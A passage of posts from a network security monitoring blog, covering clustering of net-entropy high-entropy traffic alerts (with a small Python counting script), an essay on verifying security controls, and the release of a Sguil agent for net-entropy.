A lot of the high-entropy traffic that we see is bound for random ports on IP addresses all over the world, and most of it is related to peer-to-peer apps. In the case of Skype, high-entropy TCP traffic is usually signalling traffic to SuperNodes. Traffic to a given SuperNode will occur little-and-often for a long period of time until one of the two endpoints goes offline, so net-entropy will be sending you alerts all day long for that specific destination. However, you certainly can’t say for sure that traffic matching this profile is definitely Skype (it could be a keylogger phoning home at regular intervals, for example). As such, examination of the little-and-often class of high-entropy flow doesn’t usually yield any definitive conclusion.

What is definitely interesting is where you have many high-entropy flows to the same destination address and port in a short period of time. We have detected the following by taking this “clustering” approach:

  • HTTP on a non-standard port, serving up images (most image formats are compressed, and therefore have a high-entropy signature). As an example, some of the images in search results here come from port 7777. Someone browsing this site will trigger many indicators from net-entropy in a short space of time that refer to this port.
  • HTTP proxies. Again, the high-entropy traffic is most commonly as a result of images being transferred.
  • SSL/TLSv1 on port 8083, which turned out to be traffic to a SecureSphere web application firewall.
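A minimal sketch of the clustering idea (my own illustration; the input is assumed to be a list of (timestamp, destination IP, destination port) tuples exported from net-entropy’s alerts, so adapt it to however you store yours):

from collections import defaultdict
from datetime import datetime, timedelta

def clusters(alerts, window=timedelta(minutes=10), threshold=5):
    """Flag destinations that attract many high-entropy flows in a short window."""
    by_dest = defaultdict(list)
    for ts, dst_ip, dst_port in alerts:
        by_dest[(dst_ip, dst_port)].append(ts)

    hits = []
    for dest, times in by_dest.items():
        times.sort()
        for i, start in enumerate(times):
            # Count flows to this destination inside the window starting here
            n = sum(1 for t in times[i:] if t - start <= window)
            if n >= threshold:
                hits.append((dest, n))
                break
    return hits

example = [(datetime(2010, 1, 19, 10, 0, s), "192.0.2.10", 8083) for s in range(0, 50, 10)]
print(clusters(example))  # [(('192.0.2.10', 8083), 5)]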

Clusters like this are most easily spotted by eye, with the help of visualisation. The following image is from one of my Cisco MARS reports, and shows a cluster of traffic to port 8083 in orange:

Something “worth looking at” will usually be quite clear from an image like this.

The approach I’ve taken with net-entropy has yielded neither precise nor definitive results (which certainly isn’t a complaint about net-entropy itself – it was never designed to be used the way I’m using it). But, I’ve discovered things that I’d never have known about without it, so I reckon I’ve come out on top!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Securitas Vigilantiae Instantis Praemium

Posted in General Security, NSM, Why watch the wire? on 28 October, 2009 by Alec Waters

The inner title page of MI5’s authorised history shows one of the Service’s past logos, bearing the motto: “Securitas Vigilantiae Instantis Praemium”, intended to mean “Security is the reward of unceasing vigilance”. This seems to me to be as good a motto now as it was seventy years ago.

An enterprise has numerous tools at its disposal to control what happens on its infrastructure. Some examples are technical controls (such as port filtering, or blocking access to certain types of website) and non-technical controls (such as Acceptable Use Policies, violation of which could lead to disciplinary action).

Controls like these describe what you hope should be happening on your network, which isn’t necessarily what is happening. Controls may have been:

  • Intended, but not actually implemented at all
  • Improperly implemented
  • Removed
  • Changed
  • Circumvented (intentionally or otherwise)
  • Or they may not be as effective as you’d have hoped (anti-virus is a good example).

Implementing a control and then leaving it to its own devices doesn’t seem like a viable tactic. Rather than believing it to be effective, we need to make sure it is effective through strategies like the collection of information and the (unceasing) attention to detail required to extract the greatest meaning from it.

By doing this, you can verify the effectiveness of your controls. When things go wrong, you can use what you’ve collected to help you understand what happened and how you can modify your controls to help prevent it from happening again.

Without vigilance, we have our head in the sand, hoping for the best. If our vigilance is not unceasing, Murphy’s Law dictates that something Bad will happen the moment we take our eye off the ball.

“Securitas Vigilantiae Instantis Praemium” hardly ranks as catchy, but it certainly hits the nail on the head. Well, one of the nails, anyway.


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

net-entropy Sguil agent and wiki

Posted in net-entropy, NSM, Sguil on 6 October, 2009 by Alec Waters

The story so far:

I’ve written a basic Sguil agent that will upload net-entropy’s RISING ALARM messages into Sguil. You can download the agent here, and the config file here.

On a Sguil sensor that has net-entropy installed, copy the agent to wherever your other agents live (/usr/local/bin on my system), and the config file to where your other config files live (/etc/nsm/sensor1/ on my system). Then fire it up:

net-entropy_agent.tcl -c /etc/nsm/sensor1/net-entropy_agent.conf

With a bit of luck, you’ll see the agent register in the Sguil client:

And we’ll start to see net-entropy messages appear, too:

The bottom right pane of the Sguil client will behave as it does for the PADS agent, and will show you the event detail:

Sguil will correlate these events in the usual fashion, and allow you to right-click and say “Transcript” or “Wireshark”. It all seems to work pretty well!

Finally, the net-entropy project has a new wiki – it’s here. This is the place to go for the latest source code, which now includes a Paninski entropy estimator in addition to the original Shannon estimator. Have fun!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk